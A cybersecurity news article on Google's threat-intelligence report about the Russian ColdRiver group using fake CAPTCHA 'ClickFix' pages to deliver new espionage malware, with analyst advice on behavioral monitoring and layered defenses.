Russian state-backed hackers are using fake “I am not a robot” CAPTCHA pages to deliver new strains of espionage malware, according to Google Cloud’s Threat Intelligence Group (GTIG), marking a fresh evolution in tactics by the ColdRiver group that has long targeted Western governments, think tanks, and media organizations.
The group, also known as Star Blizzard, UNC4057, or Callisto, has replaced its previously exposed LostKeys malware with a new suite of tools, including NOROBOT, YESROBOT, and MAYBEROBOT.
These programs can evade detection through multi-stage delivery chains and encrypted payloads. Google said the shift came just days after the company published technical details on LostKeys earlier this year.
ColdRiver’s latest campaign uses social engineering tactics known as “ClickFix,” tricking victims into running malicious code disguised as CAPTCHA verification steps.
“NOROBOT and its preceding infection chain have been subject to constant evolution — initially simplified to increase chances of successful deployment, before re-introducing complexity by splitting cryptography keys,” GTIG said. “The shift back to more complex delivery chains increases the difficulty of tracking their campaigns. This constant development highlights the group’s efforts to evade detection systems for their delivery mechanism for continued intelligence collection against high-value targets.”
The technique shows a growing trend in state-sponsored operations that combine psychological manipulation with stealthy modular malware to bypass enterprise defenses.
“ColdRiver’s quick pivot from exposed infrastructure to new delivery methods like fake CAPTCHAs reveals a lot about their capabilities,” said Akshat Tyagi, associate practice leader at HFS Research. “They are operationally very agile because, practically within weeks, they shifted infrastructure, rewrote delivery mechanisms, and deployed new payloads. It seems they are a well-funded and well-resourced team. They likely have a modular architecture allowing them to replace components, and they also have access to global engineering talent.”
Inside the findings
Google said the new malware families have been in active development from May through September 2025, with the attackers repeatedly refining their tools to evade detection. The pace of updates shows ColdRiver’s ability to rebuild its toolset almost immediately after public exposure.
The earliest NOROBOT sample used a cryptographic scheme that split the decryption key across multiple components that had to be recombined in a specific order to decrypt the final payload.
YESROBOT is described in Google’s report as a minimal Python backdoor that requires every command to be valid Python, making basic functions such as downloading files or retrieving documents more cumbersome to implement. The latter NOROBOT build was drastically simplified, fetching a single file that, in observed cases, installed a logon script to establish persistence.
“The specific changes made between NOROBOT variants highlight the group’s persistent effort to evade detection systems while ensuring continued intelligence collection against high-value targets,” the report said.
Evolving tactics and strategies
Analysts said ColdRiver, which for years focused on credential theft and email account compromise, is shifting toward multi-stage intrusions that rely on users to execute malicious code.
By using ClickFix pages that mimic CAPTCHA verification screens, the group can bypass email security filters and deliver malware directly to victims’ devices, increasing the likelihood of infection.
“At this stage, it is difficult to expect end users to identify and discard fraudulent CAPTCHA, since CAPTCHA is part of the standard access process,” said cybersecurity analyst Sunil Varkey. “The only option is to monitor behavioral changes, living-off-the-land telemetry, and abnormal activity through tools such as EDR and NDR. Organizations need to understand how users and hosts behave in specific scenarios and monitor deviations, which requires having a strong baseline and enforcing it.”
This shift from simple phishing to multi-stage, interactive attacks shows ColdRiver’s ability to adapt to improved cyber awareness among users. Traditional lures are less effective as people become cautious about clicking suspicious links, but CAPTCHA pages still feel familiar and safe, a trust ColdRiver has learned to exploit.
“Tactically, it indicates ColdRiver’s focus on operational security (OPSEC) and stealth,” said Sanjaya Kumar, CEO of SureShield. “The malware uses encrypted communications and anti-analysis techniques, allowing prolonged access for months without detection. Target selection remains high value, including NGOs, dissidents, policy advisors, and Western officials, but the CAPTCHA method also extends to softer targets in think tanks and academia, where quick credential theft can lead to espionage chains.”
For defenders, it underscores the need to move beyond traditional two-factor authentication and adopt behavioral and context-aware monitoring to identify stealthy, user-assisted intrusions.
Defense options for enterprises
Because the attackers target specific organizations and individuals, they can use server-side filtering to deliver malware only to selected victims, making large-scale detection difficult, analysts said. Detection is further complicated when global security vendors have not yet developed or prioritized signatures for the new attacks.
“Defenders need to be fully aware that this isn’t a basic phishing gang using off-the-shelf malware,” Varkey said. “It appears to be state-linked or state-sponsored, with significant resources and the ability to pivot to new tools and delivery methods rapidly. Defenders cannot depend solely on IOCs, and organizations may need to strengthen their security posture to protect high-value assets significantly.”
Kumar added that effective defense requires a layered and behavior-focused approach that uses tools to monitor anomalous PowerShell execution, unusual network calls to command-and-control servers, or fileless malware patterns.
Security teams should establish baselines for normal activity and generate alerts when deviations occur, such as unexpected login attempts from foreign IP addresses or rapid data exfiltration. “Focus on building a zero-trust architecture and enforce least-privilege access and micro-segmentation to limit lateral movement,” Kumar said. “Continuous vulnerability management scans to patch endpoints before exploitation, combined with security awareness training on interactive phishing (e.g., simulated CAPTCHA attacks), to cut success rates. Incident Responses need to be solidified, so simulate multi-stage attacks to test containment. Proactive cyber hygiene – regular patching, endpoint hardening, and threat hunting is essential.”
No Responses